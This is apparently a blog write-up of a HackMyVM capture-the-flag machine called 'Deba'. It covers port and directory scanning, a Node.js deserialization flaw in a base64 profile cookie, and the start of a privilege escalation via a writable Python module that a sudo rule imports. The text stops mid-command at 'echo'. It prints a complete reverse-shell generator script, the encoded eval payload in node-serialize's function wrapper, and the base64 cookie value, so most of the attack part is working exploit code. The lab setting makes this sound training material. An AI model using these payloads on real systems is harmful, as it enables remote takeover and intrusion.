{"id":886,"date":"2025-06-17T23:12:35","date_gmt":"2025-06-17T15:12:35","guid":{"rendered":"http:\/\/162.14.82.114\/?p=886"},"modified":"2025-06-17T23:12:35","modified_gmt":"2025-06-17T15:12:35","slug":"hmv-_-deba","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/886\/06\/17\/2025\/","title":{"rendered":"hmv[-_-]Deba"},"content":{"rendered":"<h1>Deba<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312754.png\" alt=\"image-20250616175838254\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312756.png\" alt=\"image-20250617134421085\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nI scanned my computer so many times, it thinks we&#039;re dating.\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.10.102:22\nOpen 192.168.10.102:80\nOpen 192.168.10.102:3000\n\nPORT     STATE SERVICE REASON         VERSION\n22\/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 22:e4:1e:f3:f6:82:7b:26:da:13:2f:01:f9:d5:0d:5b (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3jDMZ9e3Dizy\/56KbtO6qYJrxIUGMqGoi7jvTWFRivqr8zA3mhUw1AU+1QxQu5XzfdUf7GCZD+JQ8bgZq9a1r4AxtBJ\/1oGZWppdLgKX42WIVj3YEsQ\/APO9e7H\/9tVL\/3\/HsbilmE0D65dirwOTOPAd8bUF8PEDbYmCIqtpVMsFZPGo79h25G8eZV8C0WSVyMMDzCSPQLk2QQtxZrlZbo7VPKq4MklKCUUqVxJdUrP9LMx6RvJeN5Suvddv65XPtFKrCi8NKnqt9FRivCYD0eVj91eiqDShStxI3YhOdoen7WvelfiC2DdyV3BwCHQIzBvk7iSt+DPEPVZGFvTMX\n|   256 7b:09:3e:d4:a7:2d:92:01:9d:7d:7f:32:c1:fd:93:5b (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKi7LlQwUJwp6ZPk+FVpQzL6PnDtnjte5+4zfUyN84Kj4xBOljzVRs5sXulJQreYlgcsZ6nw1KipvPs4l2TYgmI=\n|   256 56:fd:3d:c2:19:fe:22:24:ca:2c:f8:07:90:1d:76:87 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIPZhEkLZvEED22fnHnSt36d1uAB\/zWnv883w8sWybcs\n80\/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n|_http-title: Apache2 Debian Default Page: It works\n|_http-server-header: Apache\/2.4.38 (Debian)\n3000\/tcp open  http    syn-ack ttl 64 Node.js Express framework\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Site doesn&#039;t have a title (text\/html; charset=utf-8).\nMAC Address: 08:00:27:32:F2:2A (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<p>Port <code>3000<\/code> is running a <code>node.js<\/code> service.<\/p>\n<h3>Directory Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php -d 2 2&gt;\/dev\/null\n\n404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200      GET      368l      933w    10701c http:\/\/192.168.10.102\/index.html\n200      GET       24l      126w    10356c http:\/\/192.168.10.102\/icons\/openlogo-75.png\n200      GET      368l      933w    10701c http:\/\/192.168.10.102\/\n[####################] - 2m    882204\/882204  0s      found:3       errors:902    \n[####################] - 2m    882184\/882184  7513\/s  http:\/\/192.168.10.102\/ <\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Sensitive port<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312757.png\" alt=\"image-20250617134926430\" \/><\/p>\n<p>Gather the relevant information again:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP:3000\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php -d 2 2&gt;\/dev\/null\n\n404      GET       10l       15w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200      GET        1l        2w       11c http:\/\/192.168.10.102:3000\/\n<\/code><\/pre>\n<p>Nothing found...<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ curl -s -I http:\/\/192.168.10.102:3000\nHTTP\/1.1 200 OK\nX-Powered-By: Express\nSet-Cookie: profile=eyJ1c2VybmFtZSI6ImFqaW4iLCJjb3VudHJ5IjoiaW5kaWEiLCJjaXR5IjoiYmFuZ2Fsb3JlIn0%3D; Max-Age=900; Path=\/; Expires=Tue, 17 Jun 2025 06:08:33 GMT; HttpOnly\nContent-Type: text\/html; charset=utf-8\nContent-Length: 11\nETag: W\/&quot;b-Ck1VqNd45QIvq3AZd8XYQLvEhtA&quot;\nDate: Tue, 17 Jun 2025 05:53:33 GMT\nConnection: keep-alive\nKeep-Alive: timeout=5\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ echo &quot;eyJ1c2VybmFtZSI6ImFqaW4iLCJjb3VudHJ5IjoiaW5kaWEiLCJjaXR5IjoiYmFuZ2Fsb3JlIn0&quot; | base64 -d\n{&quot;username&quot;:&quot;ajin&quot;,&quot;country&quot;:&quot;india&quot;,&quot;city&quot;:&quot;bangalore&quot;} <\/code><\/pre>\n<p>Found an insecure cookie!<\/p>\n<h3>Insecure node.js cookie configuration<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312758.png\" alt=\"image-20250617140147744\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312759.png\" alt=\"image-20250617140038684\" \/><\/p>\n<p>Try to use it for remote code execution:<\/p>\n<pre><code class=\"language-python\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ cat nodejsshell.py\n#!\/usr\/bin\/python\n# Generator for encoded NodeJS reverse shells\n# Based on the NodeJS reverse shell by Evilpacket\n# https:\/\/github.com\/evilpacket\/node-shells\/blob\/master\/node_revshell.js\n# Onelineified and suchlike by infodox (and felicity, who sat on the keyboard)\n# Insecurety Research (2013) - insecurety.net\n\n# This script is to exploit Deserialization vulnerability in nodejs and perform RCE\n# Usage nodejsshell.py 10.10.14.239 80\n# Ref https:\/\/www.exploit-db.com\/docs\/english\/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf\n\nimport sys\n\nif len(sys.argv) != 3:\n    print &quot;Usage: %s &lt;LHOST&gt; &lt;LPORT&gt;&quot; % (sys.argv[0])\n    sys.exit(0)\n\nIP_ADDR = sys.argv[1]\nPORT = sys.argv[2]\n\ndef charencode(string):\n    &quot;&quot;&quot;String.CharCode&quot;&quot;&quot;\n    encoded = &#039;&#039;\n    for char in string:\n        encoded = encoded + &quot;,&quot; + str(ord(char))\n    return encoded[1:]\n\nprint &quot;[+] LHOST = %s&quot; % (IP_ADDR)\nprint &quot;[+] LPORT = %s&quot; % (PORT)\nNODEJS_REV_SHELL = &#039;&#039;&#039;\nvar net = require(&#039;net&#039;);\nvar spawn = require(&#039;child_process&#039;).spawn;\nHOST=&quot;%s&quot;;\nPORT=&quot;%s&quot;;\nTIMEOUT=&quot;5000&quot;;\nif (typeof String.prototype.contains === &#039;undefined&#039;) { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; }\nfunction c(HOST,PORT) {\n    var client = new net.Socket();\n    client.connect(PORT, HOST, function() {\n        var sh = spawn(&#039;\/bin\/sh&#039;,[]);\n        client.write(&quot;Connected!\\\\n&quot;);\n        client.pipe(sh.stdin);\n        sh.stdout.pipe(client);\n        sh.stderr.pipe(client);\n        sh.on(&#039;exit&#039;,function(code,signal){\n          client.end(&quot;Disconnected!\\\\n&quot;);\n        });\n    });\n    client.on(&#039;error&#039;, function(e) {\n        setTimeout(c(HOST,PORT), TIMEOUT);\n    });\n}\nc(HOST,PORT);\n&#039;&#039;&#039; % (IP_ADDR, PORT)\nprint &quot;[+] Encoding&quot;\nPAYLOAD = charencode(NODEJS_REV_SHELL)\nprint &quot;eval(String.fromCharCode(%s))&quot; % (PAYLOAD)<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ python2 nodejsshell.py 192.168.10.107 1234\n[+] LHOST = 192.168.10.107\n[+] LPORT = 1234\n[+] 
Encoding\neval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,49,48,46,49,48,55,34,59,10,80,79,82,84,61,34,49,50,51,52,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,
101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))<\/code><\/pre>\n<p>For detailed usage see: <a href=\"https:\/\/www.exploit-db.com\/docs\/english\/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf\">https:\/\/www.exploit-db.com\/docs\/english\/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf<\/a><\/p>\n<pre><code class=\"language-bash\"># {&quot;rce&quot;:&quot;_$$ND_FUNC$$_function (){generated payload}()&quot;}\n{&quot;rce&quot;:&quot;_$$ND_FUNC$$_function 
(){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,49,48,46,49,48,55,34,59,10,80,79,82,84,61,34,49,50,51,52,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,
115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()&quot;}<\/code><\/pre>\n<p>Then <code>base64<\/code>-encode it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ echo &#039;{&quot;rce&quot;:&quot;_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,49,48,46,49,48,55,34,59,10,80,79,82,84,61,34,49,50,51,52,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,11
0,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()&quot;}&#039; | base64   
\neyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2Rl\nKDEwLDExOCw5NywxMTQsMzIsMTEwLDEwMSwxMTYsMzIsNjEsMzIsMTE0LDEwMSwxMTMsMTE3LDEw\nNSwxMTQsMTAxLDQwLDM5LDExMCwxMDEsMTE2LDM5LDQxLDU5LDEwLDExOCw5NywxMTQsMzIsMTE1\nLDExMiw5NywxMTksMTEwLDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwz\nOSw5OSwxMDQsMTA1LDEwOCwxMDAsOTUsMTEyLDExNCwxMTEsOTksMTAxLDExNSwxMTUsMzksNDEs\nNDYsMTE1LDExMiw5NywxMTksMTEwLDU5LDEwLDcyLDc5LDgzLDg0LDYxLDM0LDQ5LDU3LDUwLDQ2\nLDQ5LDU0LDU2LDQ2LDQ5LDQ4LDQ2LDQ5LDQ4LDU1LDM0LDU5LDEwLDgwLDc5LDgyLDg0LDYxLDM0\nLDQ5LDUwLDUxLDUyLDM0LDU5LDEwLDg0LDczLDc3LDY5LDc5LDg1LDg0LDYxLDM0LDUzLDQ4LDQ4\nLDQ4LDM0LDU5LDEwLDEwNSwxMDIsMzIsNDAsMTE2LDEyMSwxMTIsMTAxLDExMSwxMDIsMzIsODMs\nMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEw\nMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSw2MSw2MSwzMiwzOSwxMTcs\nMTEwLDEwMCwxMDEsMTAyLDEwNSwxMTAsMTAxLDEwMCwzOSw0MSwzMiwxMjMsMzIsODMsMTE2LDEx\nNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5\nOSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSwzMiwxMDIsMTE3LDExMCw5OSwxMTYs\nMTA1LDExMSwxMTAsNDAsMTA1LDExNiw0MSwzMiwxMjMsMzIsMTE0LDEwMSwxMTYsMTE3LDExNCwx\nMTAsMzIsMTE2LDEwNCwxMDUsMTE1LDQ2LDEwNSwxMTAsMTAwLDEwMSwxMjAsNzksMTAyLDQwLDEw\nNSwxMTYsNDEsMzIsMzMsNjEsMzIsNDUsNDksNTksMzIsMTI1LDU5LDMyLDEyNSwxMCwxMDIsMTE3\nLDExMCw5OSwxMTYsMTA1LDExMSwxMTAsMzIsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIs\nODQsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDExOCw5NywxMTQsMzIsOTksMTA4LDEwNSwxMDEs\nMTEwLDExNiwzMiw2MSwzMiwxMTAsMTAxLDExOSwzMiwxMTAsMTAxLDExNiw0Niw4MywxMTEsOTks\nMTA3LDEwMSwxMTYsNDAsNDEsNTksMTAsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDEx\nNiw0Niw5OSwxMTEsMTEwLDExMCwxMDEsOTksMTE2LDQwLDgwLDc5LDgyLDg0LDQ0LDMyLDcyLDc5\nLDgzLDg0LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMs\nMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMTUsMTA0LDMyLDYxLDMy\nLDExNSwxMTIsOTcsMTE5LDExMCw0MCwzOSw0Nyw5OCwxMDUsMTEwLDQ3LDExNSwxMDQsMzksNDQs\nOTEsOTMsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIs
MzIsOTksMTA4LDEwNSwxMDEsMTEw\nLDExNiw0NiwxMTksMTE0LDEwNSwxMTYsMTAxLDQwLDM0LDY3LDExMSwxMTAsMTEwLDEwMSw5OSwx\nMTYsMTAxLDEwMCwzMyw5MiwxMTAsMzQsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIs\nOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTIsMTA1LDExMiwxMDEsNDAsMTE1LDEwNCw0Niwx\nMTUsMTE2LDEwMCwxMDUsMTEwLDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwx\nMDQsNDYsMTE1LDExNiwxMDAsMTExLDExNywxMTYsNDYsMTEyLDEwNSwxMTIsMTAxLDQwLDk5LDEw\nOCwxMDUsMTAxLDExMCwxMTYsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE1LDEw\nNCw0NiwxMTUsMTE2LDEwMCwxMDEsMTE0LDExNCw0NiwxMTIsMTA1LDExMiwxMDEsNDAsOTksMTA4\nLDEwNSwxMDEsMTEwLDExNiw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTUsMTA0\nLDQ2LDExMSwxMTAsNDAsMzksMTAxLDEyMCwxMDUsMTE2LDM5LDQ0LDEwMiwxMTcsMTEwLDk5LDEx\nNiwxMDUsMTExLDExMCw0MCw5OSwxMTEsMTAwLDEwMSw0NCwxMTUsMTA1LDEwMywxMTAsOTcsMTA4\nLDQxLDEyMywxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiw5OSwxMDgsMTA1LDEwMSwx\nMTAsMTE2LDQ2LDEwMSwxMTAsMTAwLDQwLDM0LDY4LDEwNSwxMTUsOTksMTExLDExMCwxMTAsMTAx\nLDk5LDExNiwxMDEsMTAwLDMzLDkyLDExMCwzNCw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwz\nMiwzMiwxMjUsNDEsNTksMTAsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDk5\nLDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsMTExLDExMCw0MCwzOSwxMDEsMTE0LDExNCwxMTEsMTE0\nLDM5LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCwxMDEsNDEsMzIsMTIz\nLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDEsMTE2LDg0LDEwNSwxMDksMTAxLDEx\nMSwxMTcsMTE2LDQwLDk5LDQwLDcyLDc5LDgzLDg0LDQ0LDgwLDc5LDgyLDg0LDQxLDQ0LDMyLDg0\nLDczLDc3LDY5LDc5LDg1LDg0LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDEyNSw0MSw1OSwxMCwxMjUs\nMTAsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsNTksMTApKX0oKSJ9Cg==<\/code><\/pre>\n<p>Setting the payload as the <code>cookie<\/code> should be enough, but:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312760.png\" alt=\"image-20250617142612806\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312761.png\" alt=\"image-20250617142641078\" \/><\/p>\n<p>The base64 output was wrapped onto multiple lines automatically, so strip the newline characters:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312762.png\" alt=\"image-20250617143601721\" \/><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ cat log | tr -d &quot;\\n&quot;<\/code><\/pre>\n<p>Then try for a reverse shell!!!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312763.png\" alt=\"image-20250617144112609\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312764.png\" alt=\"image-20250617144127461\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Hijacking a Python library<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@debian:\/var\/www$ sudo -l\nMatching Defaults entries for www-data on debian:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on debian:\n    (ALL : low) NOPASSWD: \/usr\/bin\/python3 \/home\/low\/scripts\/script.py\n(remote) www-data@debian:\/var\/www$ cat \/home\/low\/scripts\/script.py\nimport main\nimport os\n\nprint(&quot;\\n&quot;)\nos.system(&quot;ip a | grep enp0s3&quot;)\n\nprint(&quot;\\n&quot;)\n(remote) www-data@debian:\/var\/www$ ls -la \/home\/low\/scripts\ntotal 16\ndrwxr-xr-x 2 low      low      4096 may  7  2021 .\ndrwxr-xr-x 8 low      low      4096 may  7  2021 ..\n-rwxr-xr-x 1 www-data www-data   88 may  7  2021 main.py\n-rw-r--r-- 1 low      low        80 may  7  2021 script.py\n(remote) www-data@debian:\/var\/www$ cat \/home\/low\/scripts\/main.py \nfrom os import system as main\nprint(&quot;\\n&quot;)\nprint(&quot;Just main&quot;)\nmain(&quot;whoami&quot;)\nprint(&quot;\\n&quot;)<\/code><\/pre>\n<p><code>main.py<\/code> is owned by <code>www-data<\/code> and therefore writable, so overwriting it is enough:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@debian:\/var\/www$ cd \/home\/low\/scripts\/\n(remote) www-data@debian:\/home\/low\/scripts$ echo 